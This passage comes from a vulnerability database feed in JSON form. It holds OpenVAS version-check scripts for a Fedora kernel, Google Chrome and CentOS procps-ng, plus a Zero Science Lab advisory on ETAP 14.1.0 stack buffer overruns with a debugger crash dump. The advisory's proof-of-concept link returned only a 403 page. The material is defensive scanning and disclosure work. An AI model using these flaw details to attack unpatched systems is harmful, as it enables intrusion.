script_oid(\"1.3.6.1.4.1.25623.1.0.874620\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-30 06:01:28 +0200 (Wed, 30 May 2018)\");\n script_cve_id(\"CVE-2018-10840\", \"CVE-2018-3639\", \"CVE-2018-1120\", \"CVE-2018-10322\",\n \"CVE-2018-10323\", \"CVE-2018-1108\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2018-537c8312fc\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-537c8312fc\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/URE7VVHJMM7PDSJTK3THYADBW7TTXPFT\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.16.12~300.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:51", "bulletinFamily": "scanner", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "modified": "2019-05-17T00:00:00", "published": "2018-05-30T00:00:00", "id": "OPENVAS:1361412562310813504", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813504", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop_29-2018-05)-Mac OS X", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Security Updates(stable-channel-update-for-desktop_29-2018-05)-Mac OS X\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813504\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2018-6123\", \"CVE-2018-6124\", \"CVE-2018-6125\", \"CVE-2018-6126\",\n \"CVE-2018-6127\", \"CVE-2018-6128\", \"CVE-2018-6129\", \"CVE-2018-6130\",\n \"CVE-2018-6131\", \"CVE-2018-6132\", \"CVE-2018-6133\", \"CVE-2018-6134\",\n \"CVE-2018-6135\", \"CVE-2018-6136\", \"CVE-2018-6137\", \"CVE-2018-6138\",\n \"CVE-2018-6139\", \"CVE-2018-6140\", \"CVE-2018-6141\", \"CVE-2018-6142\",\n \"CVE-2018-6143\", \"CVE-2018-6144\", \"CVE-2018-6145\", \"CVE-2018-6147\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-30 11:46:46 +0530 (Wed, 30 May 2018)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop_29-2018-05)-Mac OS X\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An use after free in Blink.\n\n - Type confusion in Blink.\n\n - Overly permissive policy in WebUSB.\n\n - Heap buffer overflow in Skia.\n\n - Use after free in indexedDB.\n\n - uXSS in Chrome on iOS.\n\n - Out of bounds memory access in WebRTC, V8 and PDFium.\n\n - Incorrect mutability protection in WebAssembly.\n\n - Use of uninitialized memory in WebRTC.\n\n - URL spoof in Omnibox.\n\n - Referrer Policy bypass in Blink.\n\n - UI spoofing in Blink.\n\n - Leak of visited status of page in Blink.\n\n - Overly permissive policy in Extensions.\n\n - Restrictions bypass in the debugger extension API.\n\n - Incorrect escaping of MathML in Blink.\n\n - Password fields not taking advantage of OS protections in Views.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation can potentially\n result in the execution of arbitrary code or even enable full remote code\n execution capabilities and some unspecified impacts.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 67.0.3396.62\n on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 67.0.3396.62 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2018/05/stable-channel-update-for-desktop_58.html\");\n script_xref(name:\"URL\", value:\"https://www.google.co.in/chrome\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_macosx.nasl\");\n script_mandatory_keys(\"GoogleChrome/MacOSX/Version\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nchr_ver = infos['version'];\nchr_path = infos['location'];\n\nif(version_is_less(version:chr_ver, test_version:\"67.0.3396.62\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"67.0.3396.62\", install_path:chr_path);\n security_message(data:report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:52", "bulletinFamily": "scanner", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "modified": "2019-05-17T00:00:00", "published": "2018-05-30T00:00:00", "id": "OPENVAS:1361412562310813505", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813505", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop_29-2018-05)-Windows", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Security Updates(stable-channel-update-for-desktop_29-2018-05)-Windows\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813505\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2018-6123\", \"CVE-2018-6124\", \"CVE-2018-6125\", \"CVE-2018-6126\",\n \"CVE-2018-6127\", \"CVE-2018-6128\", \"CVE-2018-6129\", \"CVE-2018-6130\",\n \"CVE-2018-6131\", \"CVE-2018-6132\", \"CVE-2018-6133\", \"CVE-2018-6134\",\n \"CVE-2018-6135\", \"CVE-2018-6136\", \"CVE-2018-6137\", \"CVE-2018-6138\",\n \"CVE-2018-6139\", \"CVE-2018-6140\", \"CVE-2018-6141\", \"CVE-2018-6142\",\n \"CVE-2018-6143\", \"CVE-2018-6144\", \"CVE-2018-6145\", \"CVE-2018-6147\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-30 10:55:29 +0530 (Wed, 30 May 2018)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop_29-2018-05)-Windows\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An use after free in Blink.\n\n - Type confusion in Blink.\n\n - Overly permissive policy in WebUSB.\n\n - Heap buffer overflow in Skia.\n\n - Use after free in indexedDB.\n\n - uXSS in Chrome on iOS.\n\n - Out of bounds memory access in WebRTC, V8 and PDFium.\n\n - Incorrect mutability protection in WebAssembly.\n\n - Use of uninitialized memory in WebRTC.\n\n - URL spoof in Omnibox.\n\n - Referrer Policy bypass in Blink.\n\n - UI spoofing in Blink.\n\n - Leak of visited status of page in Blink.\n\n - Overly permissive policy in Extensions.\n\n - Restrictions bypass in the debugger extension API.\n\n - Incorrect escaping of MathML in Blink.\n\n - Password fields not taking advantage of OS protections in Views.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation can potentially\n result in the execution of arbitrary code or even enable full remote code\n execution capabilities and some unspecified impacts.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 67.0.3396.62\n on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 67.0.3396.62 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2018/05/stable-channel-update-for-desktop_58.html\");\n script_xref(name:\"URL\", value:\"https://www.google.co.in/chrome\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_portable_win.nasl\");\n script_mandatory_keys(\"GoogleChrome/Win/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nchr_ver = infos['version'];\nchr_path = infos['location'];\n\nif(version_is_less(version:chr_ver, test_version:\"67.0.3396.62\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"67.0.3396.62\", install_path:chr_path);\n security_message(data:report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:53", "bulletinFamily": "scanner", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "modified": "2019-05-17T00:00:00", "published": "2018-05-30T00:00:00", "id": "OPENVAS:1361412562310813503", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813503", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop_29-2018-05)-Linux", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Security Updates(stable-channel-update-for-desktop_29-2018-05)-Linux\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813503\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2018-6123\", \"CVE-2018-6124\", \"CVE-2018-6125\", \"CVE-2018-6126\",\n \"CVE-2018-6127\", \"CVE-2018-6128\", \"CVE-2018-6129\", \"CVE-2018-6130\",\n \"CVE-2018-6131\", \"CVE-2018-6132\", \"CVE-2018-6133\", \"CVE-2018-6134\",\n \"CVE-2018-6135\", \"CVE-2018-6136\", \"CVE-2018-6137\", \"CVE-2018-6138\",\n \"CVE-2018-6139\", \"CVE-2018-6140\", \"CVE-2018-6141\", \"CVE-2018-6142\",\n \"CVE-2018-6143\", \"CVE-2018-6144\", \"CVE-2018-6145\", \"CVE-2018-6147\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-30 11:46:15 +0530 (Wed, 30 May 2018)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop_29-2018-05)-Linux\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An use after free in Blink.\n\n - Type confusion in Blink.\n\n - Overly permissive policy in WebUSB.\n\n - Heap buffer overflow in Skia.\n\n - Use after free in indexedDB.\n\n - uXSS in Chrome on iOS.\n\n - Out of bounds memory access in WebRTC, V8 and PDFium.\n\n - Incorrect mutability protection in WebAssembly.\n\n - Use of uninitialized memory in WebRTC.\n\n - URL spoof in Omnibox.\n\n - Referrer Policy bypass in Blink.\n\n - UI spoofing in Blink.\n\n - Leak of visited status of page in Blink.\n\n - Overly permissive policy in Extensions.\n\n - Restrictions bypass in the debugger extension API.\n\n - Incorrect escaping of MathML in Blink.\n\n - Password fields not taking advantage of OS protections in Views.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation can potentially\n result in the execution of arbitrary code or even enable full remote code\n execution capabilities and some unspecified impacts.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 67.0.3396.62\n on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 67.0.3396.62 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2018/05/stable-channel-update-for-desktop_58.html\");\n script_xref(name:\"URL\", value:\"https://www.google.co.in/chrome\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"Google-Chrome/Linux/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nchr_ver = infos['version'];\nchr_path = infos['location'];\n\nif(version_is_less(version:chr_ver, test_version:\"67.0.3396.62\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"67.0.3396.62\", install_path:chr_path);\n security_message(data:report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:26", "bulletinFamily": "scanner", "description": "Check the version of procps-ng", "modified": "2019-03-08T00:00:00", "published": "2018-05-30T00:00:00", "id": "OPENVAS:1361412562310882892", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882892", "title": "CentOS Update for procps-ng CESA-2018:1700 centos7", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_CESA-2018_1700_procps-ng_centos7.nasl 14058 2019-03-08 13:25:52Z cfischer $\n#\n# CentOS Update for procps-ng CESA-2018:1700 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882892\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-30 05:47:22 +0200 (Wed, 30 May 2018)\");\n script_cve_id(\"CVE-2018-1124\", \"CVE-2018-1126\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for procps-ng CESA-2018:1700 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of procps-ng\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The procps-ng packages contain a set of system utilities that provide\nsystem information, including ps, free, skill, pkill, pgrep, snice, tload,\ntop, uptime, vmstat, w, watch, and pwdx.\n\nSecurity Fix(es):\n\n * procps-ng, procps: Integer overflows leading to heap overflow in\nfile2strvec (CVE-2018-1124)\n\n * procps-ng, procps: incorrect integer size in proc/alloc.* leading to\ntruncation / integer overflow issues (CVE-2018-1126)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section.\n\nRed Hat would like to thank Qualys Research Labs for reporting these\nissues.\");\n script_tag(name:\"affected\", value:\"procps-ng on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"CESA\", value:\"2018:1700\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2018-May/022847.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"procps-ng\", rpm:\"procps-ng~3.3.10~17.el7_5.2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"procps-ng-devel\", rpm:\"procps-ng-devel~3.3.10~17.el7_5.2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"procps-ng-i18n\", rpm:\"procps-ng-i18n~3.3.10~17.el7_5.2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zeroscience": [{"lastseen": "2019-11-11T16:11:28", "bulletinFamily": "exploit", "description": "Title: Operation Technology ETAP 14.1.0 Multiple Stack Buffer Overrun Vulnerabilities \nAdvisory ID: [ZSL-2016-5324](<ZSL-2016-5324.php>) \nType: Local/Remote \nImpact: System Access, DoS \nRisk: (4/5) \nRelease Date: 22.05.2016 \n\n\n##### Summary\n\nEnterprise Software Solution for Electrical Power Systems. ETAP is the most comprehensive electrical engineering software platform for the design, simulation, operation, and automation of generation, transmission, distribution, and industrial systems. As a fully integrated model-driven enterprise solution, ETAP extends from modeling to operation to offer a Real-Time Power Management System. \n\n##### Description\n\nMultiple ETAP binaries are prone to a stack-based buffer overflow vulnerability because the application fails to handle malformed arguments. An attacker can exploit these issues to execute arbitrary code within the context of the application or to trigger a denial-of-service conditions. \n \n\\-------------------------------------------------------------------------------- \n \n` STATUS_STACK_BUFFER_OVERRUN encountered \n(380c.3cc4): Break instruction exception - code 80000003 (first chance) \n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\windows\\system32\\kernel32.dll - \n*** WARNING: Unable to verify checksum for SO3Ph.exe \n*** ERROR: Symbol file could not be found. Defaulted to export symbols for SO3Ph.exe - \nkernel32!UnhandledExceptionFilter+0x71: \n00000000`76fcb8c1 cc int 3 \n0:000> r \nrax=0000000000000000 rbx=0000000000000000 rcx=000063dde1df0000 \nrdx=000000000000fffd rsi=0000000000000001 rdi=0000000000000002 \nrip=0000000076fcb8c1 rsp=00000000000fe780 rbp=ffffffffffffffff \nr8=0000000000000000 r9=0000000000000000 r10=0000000000000000 \nr11=00000000000fe310 r12=0000000140086150 r13=0000000000000000 \nr14=000000000012eb00 r15=0000000000000000 \niopl=0 nv up ei pl nz na po nc \ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206 \nkernel32!UnhandledExceptionFilter+0x71: \n00000000`76fcb8c1 cc int 3 \n` \n\\-------------------------------------------------------------------------------- \n \n\n\n##### Vendor\n\nOperation Technology, Inc. - <http://www.etap.com>\n\n##### Affected Version\n\n14.1.0.0 \n\n##### Tested On\n\nMicrosfot Windows 7 Professional SP1 (EN) x86_64 \nMicrosoft Windows 7 Ultimate SP1 (EN) x86_64 \n\n##### Vendor Status\n\n[07.04.2016] Vulnerabilities discovered. \n[11.04.2016] Vendor contacted. \n[21.05.2016] No response from the vendor. \n[22.05.2016] Public security advisory released. \n\n##### PoC\n\n[etap_bof.txt](<../../codes/etap_bof.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <https://cxsecurity.com/issue/WLB-2016050107> \n[2] <https://www.exploit-db.com/exploits/39846/> \n[3] <https://packetstormsecurity.com/files/137145> \n[4] <http://www.vfocus.net/art/20160524/12702.html> \n[5] <https://exchange.xforce.ibmcloud.com/vulnerabilities/113434>\n\n##### Changelog\n\n[22.05.2016] - Initial release \n[23.05.2016] - Added reference [1], [2] and [3] \n[25.05.2016] - Added reference [4] \n[27.05.2016] - Added reference [5] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "modified": "2016-05-22T00:00:00", "published": "2016-05-22T00:00:00", "id": "ZSL-2016-5324", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2016-5324.php", "title": "Operation Technology ETAP 14.1.0 Multiple Stack Buffer Overrun Vulnerabilities", "type": "zeroscience", "sourceData": "<html><head><title>403 Nothing to see.</title>\n<link rel=\"Shortcut Icon\" href=\"favicon.ico\" type=\"image/x-icon\">\n<style type=\"text/css\">\n\n</style>\n</head>\n<body bgcolor=black>\n<center>\n<font color=\"#7E88A3\" size=\"2\">\n<br /><br />\n<h1>403 Nothing to see.</h1>\n\nYou do not have the powah for this request /403.shtml<br /><br />\n<font size=\"2\"><a href=\"https://www.zeroscience.mk\">https://www.zeroscience.mk</a></font>\n</font></center>\n</body></html>", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/etap_bof.txt"}]}